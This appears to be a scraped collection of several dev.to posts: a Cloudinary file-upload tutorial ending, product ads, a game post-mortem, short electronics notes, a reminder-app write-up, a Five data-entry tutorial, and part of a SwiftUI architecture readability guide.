cloud_name: process.env.CLOUDINARY_CLOUD_NAME,
api_key: process.env.CLOUDINARY_API_KEY,
api_secret: process.env.CLOUDINARY_API_SECRET
});
// Configure CloudinaryStorage
const storage = new CloudinaryStorage({
cloudinary: cloudinary,
params: {
folder: 'uploads', // Optional: Folder for uploaded files in Cloudinary
allowed_formats: ['jpg', 'jpeg', 'png'], // Optional: Restrict allowed file types
transformation: [{ width: 500, height: 500, crop: 'limit' }] // Optional: Apply image transformations on upload
}
});
const upload = multer({ storage: storage });
// Example route for file upload
app.post('/upload', upload.single('file'), (req, res) => {
console.log('Uploaded file details:', req.file);
// Access uploaded file information (filename, path, etc.)
// Further processing or database storage (optional)
res.json({ success: true, file: req.file });
});
app.listen(port, () => {
console.log(`Server is running on http://localhost:${port}`);
});
```
## Step 3: Understanding the Code

### Importing Modules and Configuring the Environment
We start by importing the necessary modules, including `express`, `multer`, `@fluidjs/multer-cloudinary`, `cloudinary`, and `dotenv`. The `dotenv` package helps us load environment variables from our `.env` file.

### Configuring Cloudinary
We configure Cloudinary with the credentials stored in our `.env` file. This ensures that our application can communicate with Cloudinary's API.

### Setting Up CloudinaryStorage
We create a `CloudinaryStorage` instance, specifying various options:
- **Folder**: Determines the folder in Cloudinary where uploaded files will be stored.
- **Allowed Formats**: Restricts the types of files that can be uploaded.
- **Transformation**: Applies transformations (like resizing) to the uploaded images.

### Configuring Multer and Defining the Upload Route
We create a `multer` instance using our `CloudinaryStorage` configuration. Then, we define a POST route `/upload` to handle file uploads. When a file is uploaded, its details are logged to the console and returned in the response. You can add further processing or store details in a database as needed.
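To try the route out, here is a minimal client-side sketch (assuming the server above is running on `http://localhost:8080`; the field name passed to `formData.append` must match the one given to `upload.single('file')`):

```javascript
// Minimal client-side sketch: upload a File (or Blob) to the /upload route.
// Assumes the Express server from this article is running on localhost:8080.
async function uploadFile(file) {
  const formData = new FormData();
  // The field name 'file' must match upload.single('file') on the server.
  formData.append('file', file);

  const response = await fetch('http://localhost:8080/upload', {
    method: 'POST',
    body: formData,
  });
  return response.json(); // resolves to { success: true, file: { ... } }
}
```

In a browser you would call `uploadFile(input.files[0])` from a file input's `change` handler; the resolved object contains the uploaded file's Cloudinary details returned by the server.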
## Conclusion
By using `@fluidjs/multer-cloudinary`, you can simplify the process of uploading files to Cloudinary from an Express.js application. This setup is easy to implement and offers flexibility for handling various file upload scenarios.
Feel free to explore Cloudinary's documentation for more options on image transformations and the multer documentation for advanced file upload configurations. Happy coding!
---
For more community support and discussions, join our [Discord server 🎮](https://discord.gg/hUG9b85MJb).
You can find the npm package [@fluidjs/multer-cloudinary 📦](https://www.npmjs.com/package/@fluidjs/multer-cloudinary) on npm.
| imani_brown_1a7d9bc29dd27 |
1,917,967 | Tier 1 Support | We are USA based Multi-lingual Technical Support Experts. They provide Tier 1, 2 & 3 Support,... | 0 | 2024-07-10T02:11:53 | https://dev.to/peaceysystems/tier-1-support-21lm | We are USA based Multi-lingual Technical Support Experts. They provide Tier 1, 2 & 3 Support, Network Operations Support, Installation support since 2007.
| peaceysystems | |
1,917,968 | Post-mortem on the Test of Insanity | Howdy, today I'm here to discuss the development process of our latest game: THE TEST OF... | 0 | 2024-07-10T04:19:42 | https://dev.to/jacklehamster/post-mortem-on-the-test-of-insanity-14a6 | gamedev, godot, insanity, crazy | Howdy,
today I'm here to discuss the development process of our latest game:
## THE TEST OF INSANITY
This game is published under a new brand: [Big Nuts](https://bignutsgames.itch.io/), and developed using Godot
### A rocky start
Originally, KC and I were thinking of the kind of games we liked. Immediately, we found a common interest in JRPG (the likes of Final Fantasy, Phantasy Star...). So this was our obvious choice. We were going to build an epic JRPG, filled with wondrous world building and a very elaborate story.

We were very well aware that this was a very ambitious project, so we cautiously reduced the scope. This came down to:
- Just one village
- Simple turn-based combat
- A limited number of playable characters
- An inventory and skill system that isn't too complex
Somehow, this seemed pretty doable to implement.
But soon, we came to the realization that the task could take a very long time, perhaps 6 months or even a year. I can't keep my interest that long on a single project!

### The devil is in the content
My misconception came from the fact that JRPG mechanics are somewhat simple to implement. The problem isn't the mechanics. The challenge is: How do you make an JRPG fun?
Before players can get engrossed in the story, their attention needs to be caught. As it turns out, JRPG mechanics alone are not entertaining enough for players.
In most RPG games, the novelty comes from gorgeous art and a sophisticated world to explore.
When that's not enough, there are some complex but interesting battle mechanics.
On top of that, some games add mini-games, such as Blitzball, Chocobo racing... My favorite JRPG, Phantasy Star, doesn't have all that, but it starts the game with both a top-down view and dungeon crawling!

So this is where all the work comes from. Just the thought of it made working on the game somewhat discouraging.
### Starting over

Thankfully, we were okay with letting go of the work we had already put into the JRPG, and we decided to pivot to a new idea. This time, we changed our goal: on top of making a fun game, it also had to be doable in a month!
We started brainstorming a few ideas and ranking them using those criteria.
### A game to rule them all
We came up with tons of fun ideas, but the one we landed on was a variation of "The Impossible Quiz", where we could also mix quizzes and "mini-game" puzzles.

As it turns out, "mini-game" puzzles meant we could pretty much implement all the game ideas we had from the brainstorming session, so yeah, here we go underestimating the work again... But hey, at least now it was actually doable in a month!
### Getting started by setting the tone
I think we both had a pretty good idea of the kind of game we wanted: a bit silly, requiring some thinking outside the box and using your brain. To get started, I knew that we would need some kind of template, where we simply mark the level as complete and move to the next puzzle. That could be the base for all our other puzzles. So I just made a button that you could press to move to the next level.
Somehow, I felt like this was a good opportunity to set the tone for the game. So, a bit as a joke, I made the button move every time you try to press it, such that you can never pass the level. The best part is that you can actually solve that level, if you put some thought into it.

That's right, that's our first level in "The Test of Insanity". Just in case you were wondering, our first level isn't trolling you. There's an actual solution to solve it without skipping.
### Smooth sailing

We were both working on the game, and things went very smoothly. I recently chatted with a friend about working on this game, and he asked about our process for code review. That's when I realized: we don't have any of that! KC and I were able to work independently on our own levels, without having to scrutinize each other's code.
Should we do that? Isn't there a reason why software engineers generally perform code reviews?
Well, maybe. But if you think carefully about it, there are also reasons why some people enjoy coding for their side hustle while dreading doing the exact same thing at a big company. It's liberating to work the way you like without being judged. I think one of the big lessons here is that you don't always need to apply your "good" work practices to your hobby project. Make up your own rules!
In the end, our project has an inconsistent coding style and two different art styles, and we're perfectly fine with that!
### The challenges to come

As you all know, releasing the game isn't the end of the story. There's still a lot of work left to spread the word around and make our game popular.
We're pretty satisfied with it, and so far, play-testers seem to have fun solving the puzzles, trying to not go insane. So why not give it a try?
**We welcome you to try our game using the links below. Be sure to wishlist it on Steam so you get notified about juicy sales!**
{% twitter 1810818717049114923 %}
### Link to demo
Newgrounds: https://www.newgrounds.com/portal/view/938341
Itch.io: https://bignutsgames.itch.io/the-test-of-insanity
{% embed https://www.youtube.com/watch?v=VIkVK9_I164 %}
| jacklehamster |
1,917,970 | ANTlabs SG Express 5100 | BOOK A DEMO https://calendly.com/richard-720/30min Start small with this full-featured gateway for... | 0 | 2024-07-10T02:14:35 | https://dev.to/peaceysystems/antlabs-sg-express-5100-84m | BOOK A DEMO https://calendly.com/richard-720/30min
Start small with this full-featured gateway for quality Hotel WiFi, and pick only the features you need for your network.
An all-in-one Service Management Platform, the ANTlabs SG Express 5100 is ideal for smaller (100-150 room) properties such as boutique hotels, hostels, healthcare facilities and many more.
| peaceysystems | |
1,917,971 | ANTlabs SG Express 5200 | BOOK A DEMO https://calendly.com/richard-720/30min A better all-in-one Service Management Platform to... | 0 | 2024-07-10T02:15:07 | https://dev.to/peaceysystems/antlabs-sg-express-5200-38a5 | BOOK A DEMO https://calendly.com/richard-720/30min
A better all-in-one Service Management Platform to monetize existing Internet services, maximize limited bandwidth, and improve user experience
Designed for the hospitality sector, the ANTlabs SG Express 5200 meets the High Speed Internet Access (HSIA) needs of guest networks such as hotels, waiting rooms, business centers and F&B, while allowing hoteliers to roll out free HSIA WiFi that pays for itself.
| peaceysystems | |
1,917,972 | MAX232 IC:Features,Applications and Types | The MAX232 integrated circuit (IC) was engineered by Maxim Integrated Products and functions as a... | 0 | 2024-07-10T02:16:14 | https://dev.to/candice88771483/max232-icfeaturesapplications-and-types-2ln0 | programming | The MAX232 integrated circuit (IC) was engineered by Maxim Integrated Products and functions as a voltage logic converter, transforming TTL logic levels into TIA or EIA-232-F levels. It serves as a crucial intermediary for communication between PCs and microcontrollers. This IC finds application in various fields including terminals, battery-operated systems, computers, modems, and more.
What is the MAX232 IC?
The MAX232 IC is extensively utilized for facilitating serial communication between microcontrollers and PCs. Its primary role is to convert TTL/CMOS logic levels to RS232 levels during the serial communication process.
| candice88771483 |
1,917,973 | What integrated circuit chip is | What it is An integrated circuit chip design that integrates compound semiconductors with silicon... | 0 | 2024-07-10T02:17:17 | https://dev.to/candice88771483/what-integrated-circuit-chip-is-2pmo | programming |
What it is
An [integrated circuit chip](https://www.blikai.com/blog/components-parts/integrated-circuit-chip-types-applications-and-faq) design that integrates compound semiconductors with silicon complementary metal-oxide semiconductor (CMOS) technology, which is the basis for most of today’s integrated circuits.
Why it matters
Over 20 years ago, Eugene Fitzgerald of MIT developed strained silicon technology, overcoming the then-existing limits on the number of transistors on a computer chip. This innovation allowed Moore’s Law, which predicts the doubling of transistors on a chip every 18 months, to continue. However, silicon and compound semiconductor devices have now reached their natural limits and cannot independently provide the functionalities needed for further innovation. Fitzgerald, who is also the CEO and director of the Singapore MIT Alliance for Research and Technology (SMART), is developing an integrated circuit chip design that exceeds the natural capacity of silicon. By incorporating higher-performance compound semiconductors into integrated silicon circuit designs, it will be possible to create chips that drive advancements in product, system, and software design. These new chips will play a crucial role in the next generation of user interfaces for virtual and augmented reality, as well as 5G and 6G connectivity applications.
| candice88771483 |
1,917,983 | Building a Reminder App with Html, Css & javascript | Introduction I am excited to share the journey of building a Reminder app, a React Native... | 0 | 2024-07-10T02:46:15 | https://dev.to/bigelan/building-a-reminder-app-with-html-css-javascript-1bce |
Introduction
I am excited to share the journey of building a Reminder app, a web application built with HTML, CSS, and JavaScript as a portfolio project. The project kicked off on July 4, 2024, and had to be completed by July 11, 2024. My goal was to create an app that manages different tasks effortlessly, letting you organize, prioritize, and track your to-dos seamlessly in a user-friendly web application.
Target Audience
This application is designed for anyone who wants a simple and user-friendly way to manage their to-do list. Just like keeping a note in your pocket, this app allows you to easily capture, organize, and track your reminders – all in one convenient place.
Personal Focus
My personal focus was on ensuring efficient state management and a clean, maintainable project architecture.
The Story Behind the Project
I am passionate about productivity and helping people stay organized. We often have discussions about the best ways to manage tasks and to-do lists. Growing up, I didn't have access to many resources for staying on top of my commitments. This project was a way for me to combine my interest in fostering organization with my technical skills to create a tool that empowers users to manage their tasks effectively.
One particular memory fuels my passion for this project. I vividly remember the satisfaction of completing a task and the sense of accomplishment that came with it. This project sparked a desire to create something that could bring that same sense of achievement to users as they check off their reminders and reach their goals.
Summary of Accomplishments
This user-friendly reminder app empowers you to stay on top of your tasks with features inspired by intuitive organization tools:
Task Categorization: Organize your reminders into categories for better focus and prioritization.
Rich Task Details: Add detailed descriptions and due dates to each reminder for clarity and context.
List Management: Effortlessly add, edit, and check off reminders to keep your list streamlined.
Completion Tracking: Gain a sense of accomplishment as you visualize completed reminders and track your progress towards goals.
Technologies Used
Frontend: Html, Css and Javascript
Architecture Diagram
Key Features
Reminder Browsing: Users can explore their reminders across various categories.
The Biggest Hurdle: Keeping Reminders Up-to-Date
Challenge:
One of the biggest hurdles in developing this reminder app was ensuring that updates to reminders were reflected instantly across the entire application. This meant that regardless of which screen the user was on (adding a new reminder, viewing a specific reminder, etc.), any changes should be immediately visible.
Solution:
To achieve this seamless experience, I focused on implementing a robust state management system. This involved setting up mechanisms to track changes, update the central data source, and efficiently communicate those updates to all relevant parts of the app. Additionally, considerations were made for potential data persistence (optional, depending on app functionality) to ensure reminders remain even after the app is closed and reopened.
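As an illustration, the pattern described above can be sketched in plain JavaScript. The names here are illustrative, not the project's actual code: a single central store holds the reminders, and every screen subscribes to it so that any change is visible everywhere immediately.

```javascript
// Illustrative sketch of a central reminder store with change notifications.
const reminderStore = {
  reminders: [],
  listeners: [],
  subscribe(listener) {
    // Each screen registers a callback that re-renders it on every change.
    this.listeners.push(listener);
  },
  notify() {
    this.listeners.forEach((listener) => listener(this.reminders));
  },
  add(text, dueDate) {
    this.reminders.push({ id: this.reminders.length + 1, text, dueDate, done: false });
    this.notify();
  },
  toggle(id) {
    const reminder = this.reminders.find((r) => r.id === id);
    if (reminder) {
      reminder.done = !reminder.done;
      this.notify();
    }
  },
};

// A "screen" subscribing once; it updates on every add/toggle instantly.
reminderStore.subscribe((reminders) => {
  const open = reminders.filter((r) => !r.done).length;
  console.log(`Open reminders: ${open}`);
});

reminderStore.add('Finish portfolio write-up', '2024-07-11');
```

For persistence across sessions, the same `notify` hook could also write the list to `localStorage`.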
Conquering the Challenge: Real-Time Reminders
Success! After persistent effort and debugging, I achieved real-time updates for reminders across the app. This smooth experience is vital for user satisfaction and provided valuable insights into managing dynamic data.
Key Learnings:
State Management: The project solidified the importance of efficient state management for complex applications.
Real-Time Updates: I gained valuable experience in implementing real-time updates within the app itself.
User-Centric Design: The focus on seamless updates reinforces the importance of a user-friendly and intuitive interface.
Personal Growth:
Problem-Solving Prowess: Overcoming the real-time update challenge honed my problem-solving skills.
Future Vision:
Enhanced Security: Implementing a robust user authentication system for added security.
Intuitive Navigation: Integrating a search function to streamline reminder retrieval.
Delightful Design: Elevating the user experience through design improvements and animations.
About Me
I am a passionate software engineer with a keen interest in building user-centric applications. This project allowed me to combine my technical skills with my love for creating intuitive user experiences. You can find more about this project and my other works on my GitHub and LinkedIn profiles.
GitHub: Project Repository (https://github.com/elanjaja/Todo-List-App)
LinkedIn: My LinkedIn Profile (https://www.linkedin.com/in/elan-jaja/)
Deployed Project: Reminder App (https://todo-list-app-delta-gules.vercel.app/)
Thank you for reading about my journey in building this Reminder App. I look forward to applying these skills in future projects and continuing to grow as a software engineer.
| bigelan | |
1,917,977 | How to Build a Data Entry System (Quick & Easy Guide) | Build a Data Entry System In 3 Steps In this guide, we detail the steps necessary to construct and... | 0 | 2024-07-10T02:25:25 | https://five.co/blog/how-to-build-a-data-entry-system/ | database, datascience, mysql, tutorial | <!-- wp:heading -->
<h2 class="wp-block-heading">Build a Data Entry System In 3 Steps</h2>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>In this guide, we detail the steps necessary to construct and deploy a data entry system using Five's rapid application development environment.</p>
<!-- /wp:paragraph -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">What is a Data Entry System?</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>A data entry system is a platform designed to capture, store, manage, and analyze data. These systems facilitate the collection of vital information for decision-making, research, analysis, and reporting. Data entry systems range from basic <a href="https://www.typeform.com/forms/">online forms</a> to advanced software integrated with databases and analytical tools.</p>
<!-- /wp:paragraph -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading -->
<h2 class="wp-block-heading">Essential Components of a Data Entry System:</h2>
<!-- /wp:heading -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li><strong>Online Forms:</strong> Forms on the web that users complete to submit their data.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li><strong>Databases:</strong> Systems like <a href="https://five.co/blog/what-is-mysql/">MySQL</a>, PostgreSQL, or MongoDB that organize and store the entered data.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li><strong>Data Security:</strong> Measures to protect data from unauthorized access and breaches.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li><strong>Analytics Tools:</strong> Software to query databases, generate <a href="https://five.co/blog/generate-mysql-pdf-report/">reports</a>, and visualize data.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li><strong>Dashboards:</strong> Interactive interfaces providing real-time insights and trends.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Building a Data Entry System with Five:</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Creating a data entry application in Five provides numerous benefits over traditional form builders, especially for those requiring robust, secure, and analyzable data.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>One of the standout features of Five is the ability to create login-protected forms. This feature ensures that only authorized users can access and submit data, significantly enhancing the security of your data entry system. Traditional form builders often lack such advanced security features, potentially exposing your data to unauthorized access.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>Moreover, Five allows you to connect your data entry system directly to a database. This connection means you can query the database and generate visual representations of the data, making it easier to identify trends, patterns, and correlations. In contrast, most traditional form builders require exporting data to third-party tools for analysis, which adds extra steps and potential for errors.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>Data entry systems built with Five are designed for professional-grade data entry, making them ideal for extensive surveys, research projects, or feedback analysis.</p>
<!-- /wp:paragraph -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading -->
<h2 class="wp-block-heading">Step-by-Step Guide to Building a Data Entry System</h2>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>To follow this tutorial on building a data entry system, <a href="https://five.co/get-started/">sign up for free access to Five.</a></p>
<!-- /wp:paragraph -->
<!-- wp:tadv/classic-paragraph -->
<div style="background-color: #001524;"><hr style="height: 5px;" />
<pre style="text-align: center; overflow: hidden; white-space: pre-line;"><span style="color: #f1ebda; background-color: #4588d8; font-size: calc(18px + 0.390625vw);"><strong>Build a Data Entry Application<br /></strong><span style="font-size: 14pt;">Check out Five's online data entry</span></span></pre>
<p style="text-align: center;"><a href="https://five.co/get-started/" target="_blank" rel="noopener"><button style="background-color: #f8b92b; border: none; color: black; padding: 20px; text-align: center; text-decoration: none; display: inline-block; font-size: 18px; cursor: pointer; margin: 4px 2px; border-radius: 5px;"><strong>Get Instant Access</strong></button><br /></a></p>
<hr style="height: 5px;" /></div>
<!-- /wp:tadv/classic-paragraph -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Step 1: Setting Up the Database for Your Data Entry System</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p><strong>Start with Five's Data Entry Platform</strong></p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>To begin, sign up for free access to Five and create a new application by navigating to the "Applications" section and clicking the yellow plus button.</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Create a New Application:</h4>
<!-- /wp:heading -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Click the yellow plus button.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Name your application (e.g., My First App or Data Entry Form).</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Confirm by clicking the check icon in the upper right corner.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3271,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Yellow-Plus-Button-Create-a-New-Application-1024x649-1-1.png" alt="" class="wp-image-3271"/></figure>
<!-- /wp:image -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Click the blue "Manage" button to enter the development environment.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3272,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Manage-Your-Application-1024x576-1-1.png" alt="" class="wp-image-3272"/></figure>
<!-- /wp:image -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Create Database Tables:</h4>
<!-- /wp:heading -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Go to <code>Data > Table Wizard</code>, a point-and-click interface for creating database tables.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3273,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Table-Wizard-1024x649-1-1-1.png" alt="" class="wp-image-3273"/></figure>
<!-- /wp:image -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Name your table.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Add fields to your table using the plus button, specifying the data types (e.g., text, integer, float).</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Choose appropriate data and display types to ensure your data is stored and displayed correctly. For example, use <code>Float.2</code> for prices with two decimal places.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Save your table by clicking the check icon in the upper right corner. Your MySQL database table is now ready to store data.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3274,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Excel-to-Web-App-Database-Fields-1024x626-1-1-1.png" alt="" class="wp-image-3274"/></figure>
<!-- /wp:image -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Step 2: Designing the Data Entry Form</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Next, navigate to <code>Visual > Form Wizard</code> in Five.</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Select Data Source:</h4>
<!-- /wp:heading -->
<!-- wp:list {"ordered":true} -->
<ol><!-- wp:list-item -->
<li>In the Form Wizard’s General section, select the database table you created as the <strong>main data source.</strong></li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>This links your backend (database) with your frontend (form).</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3275,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Form-Wizard-Creating-a-form-1024x656-4-1.png" alt="" class="wp-image-3275"/></figure>
<!-- /wp:image -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Create the Form:</h4>
<!-- /wp:heading -->
<!-- wp:list {"ordered":true} -->
<ol><!-- wp:list-item -->
<li>Click the check icon in the upper right corner to finalize the form creation.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Your form is now complete and connected to your database.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Step 3: Deploying the Form</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>To deploy your form:</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Deploy to Development:</h4>
<!-- /wp:heading -->
<!-- wp:list {"ordered":true} -->
<ol><!-- wp:list-item -->
<li>Click the “Deploy to Development” button in the top right corner. This opens your app in a new browser tab.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Your prototype data entry app is now live. To enhance it, consider adding <a href="http://five.co/themes">themes</a> or additional features.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Securing Your Data Entry Form: Logins, Authentication, Permissions</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Five allows you to quickly build secure online data entry systems with user roles and permissions.</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Add User Roles and Logins:</h4>
<!-- /wp:heading -->
<!-- wp:list {"ordered":true} -->
<ol><!-- wp:list-item -->
<li>Turn your application into a <a href="https://help.five.org/2.5/docs/applications/adding-managing-applications/">multi-user app</a>, automatically adding a login screen.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Create user roles with specific permissions. For instance, one role can submit forms while another can view a dashboard summarizing form responses.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Explore Five’s documentation for more detailed instructions on setting up user roles and permissions.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->
<!-- wp:paragraph -->
<p>By following these steps, you can create a robust, secure, and efficient data entry system using Five’s rapid application development environment.</p>
<!-- /wp:paragraph -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading -->
<h2 class="wp-block-heading">Conclusion: How to Build a Data Entry System</h2>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Building a data entry system with Five’s rapid application development environment offers numerous advantages over traditional form builders. The process involves three key steps: creating the database, designing the form, and launching the web form. Five provides security features, including login protection, authentication, and permissions, ensuring that your data entry system is secure and only accessible to authorized users.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>By using Five, you can directly connect your data entry system to a database, enabling efficient data management and real-time analysis through custom charts and visual representations. This capability allows you to easily identify trends, patterns, and correlations, which is often cumbersome and error-prone with traditional form builders that require exporting data to third-party tools.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>With Five, you can streamline your data entry process, strengthen data security, and use analytical tools to gain insights, making it the superior choice for building a comprehensive and efficient data entry system.</p>
<!-- /wp:paragraph --> | domfive |
1,917,978 | 3 Rs of Software Architecture for iOS based in SwiftUI | Software Architecture After over 50 years of software engineering, we still haven't... | 0 | 2024-07-10T02:33:58 | https://dev.to/maatheusgois/3-rs-of-software-architecture-for-ios-based-in-swiftui-c6j | ios, refactoring, swiftui, cleancode | ## Software Architecture
After over 50 years of software engineering, we still haven't settled on a precise definition of software architecture. It remains the art within computer science, persistently evading our efforts to pin it down. Nevertheless, its importance to the industry and applications is undeniable.
Despite this lack of consensus, numerous definitions bring us closer to formalizing software architecture. One of the most notable comes from the IEEE:
>"Architecture is the fundamental organization of a system embodied in its components, their relationships to each other, and to the environment, and the principles guiding its design and evolution." [IEEE 1471]
While this definition and others clarify the elements that constitute architecture, they don't provide a mental model for developing applications. This project aims to fill that gap. By focusing on three key "ilities"—readability, reusability, and refactorability—we can create a hierarchy of architectural attributes that offers a framework for thinking about system code and architecture. It won't provide a ready-made architecture, but it will guide you in determining what architecture works best for your iOS application.
## What is This Project?
This project serves as a guide to analyze three key "ilities" of software architecture—readability, reusability, and refactorability—and demonstrates how hierarchical thinking about these concepts can lead to better code. It is designed for developers of all skill levels, though beginners may find it particularly beneficial.
We will explore a simple `Shopping Cart` application written in Swift, utilizing the SwiftUI framework. Swift and SwiftUI are popular choices among both newcomers and seasoned developers, making them an excellent common language for discussing code quality.
Our application will be developed incrementally, with "Bad" vs. "Good" versions compared at each step within the 3R hierarchy. You can find all the code in the `Example` directory, along with instructions on how to build and develop the application at the end of this README.
It's important to note that this project is not the definitive way to approach software architecture, nor does it provide a complete architecture. However, it offers guidance to help shape your thinking, as it has shaped mine.
Without further ado, let's get started!
## 1. Readability
Readability is the simplest measure of code quality and the easiest to address. It is the first thing you notice when you open a piece of code and generally includes:
- Formatting
- Variable names
- Function names
- Number of function arguments
- Function length (number of lines)
- Nesting levels
These aren't the only factors, but they are immediate red flags. Fortunately, there are a few straightforward rules to follow to fix issues related to these aspects:
- **Invest in an automatic formatter:** Find one that your team agrees on and integrate it into your build process. Arguing over formatting during code reviews wastes time and money. In this project, we will use [SwiftFormat](https://github.com/nicklockwood/SwiftFormat).
- **Use meaningful and pronounceable variable/function names:** Code is for people, and only incidentally for computers. Naming is the most significant way to communicate the meaning behind your code.
- **Limit function arguments to between 1-3:** Zero arguments imply you're mutating state or relying on state from somewhere other than the caller. More than three arguments make the code hard to read and refactor due to the numerous paths the function can take.
- **Function length:** There is no set limit of lines for a function, as this depends on the language you're coding in. However, a function should do ONE thing and ONE thing only. For example, a function calculating an item's price after taxes should not also connect to a database, look up the item, and get the tax data. Long functions usually indicate that too much is happening.
- **Limit nesting levels:** More than two levels of nesting can imply poor performance (especially in loops) and can be hard to read in long conditionals. Consider extracting nested logic into separate functions.
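As a quick illustration of the "one thing per function" and argument-count rules, here is a minimal sketch in plain Swift, building on the price-after-tax example above (the function names are illustrative, not taken from the example app):

```swift
import Foundation

// Does ONE thing: computes a price after tax. No database lookups,
// no logging, no UI work -- just the calculation.
func priceAfterTax(price: Double, taxRate: Double) -> Double {
    price * (1 + taxRate)
}

// Also does ONE thing: formats an amount for display.
func formattedPrice(_ amount: Double, symbol: String) -> String {
    "\(symbol)\(String(format: "%.2f", amount))"
}

// Composing small, well-named functions keeps each one short,
// keeps argument lists tiny, and avoids deep nesting.
let total = priceAfterTax(price: 100, taxRate: 0.1)
print(formattedPrice(total, symbol: "$")) // "$110.00"
```

Each function is also trivially testable on its own, which pays off again when we get to refactorability.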
Now, let's take a look at the first piece of our `Shopping Cart` application to see what poor readability looks like:
```swift
// Example/BadCode/BadCode/Readability/InventoryView.swift
import SwiftUI
struct invView: View{
private let c = "$" // currency
@State private var _i = [ // inventory
1: invItem(pdt: "Flashlight", img: "placeholder",
desc: "A really great flashlight", price: 100, c: "usd"),
2: invItem(pdt: "Tin can", img: "placeholder",
desc: "Pretty much what you would expect from a tin can", price: 32, c: "usd"),
3: invItem(pdt: "Cardboard Box", img: "placeholder",
desc: "It holds things", price: 5, c: "usd")
]
var body:some View {
List {
ForEach(_i.keys.sorted(), id: \.self) { key in
let i = self._i[key]!
HStack {
Image(i.img)
